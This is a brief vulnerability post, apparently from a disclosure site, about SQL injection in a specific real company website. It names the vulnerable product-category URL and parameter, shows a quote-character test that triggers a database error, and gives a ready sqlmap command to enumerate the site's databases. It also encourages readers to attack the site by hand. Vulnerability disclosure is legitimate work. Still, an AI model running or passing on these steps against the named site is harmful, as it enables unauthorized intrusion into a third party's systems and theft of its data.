PulsFOG - SQL Injection

2021.04.04
br uromulou (BR) br
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Hey, on fleek? Website : www.pulsfog.com.br Vulnerability : SQL Injection Discovered by uRomulou 1 . Go to http://www.pulsfog.com.br/produtos.php?id_cate=1 2 . Test SQL Injection, http://www.pulsfog.com.br/produtos.php?id_cate=1%27 3 . It is return SQL error 4 . To exploit, with tools such as sqlmap or others, or if you know, attack with your hands! Example with sqlmap : sqlmap --random-agent --url http://www.pulsfog.com.br/produtos.php?id_cate=1 --dbs


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top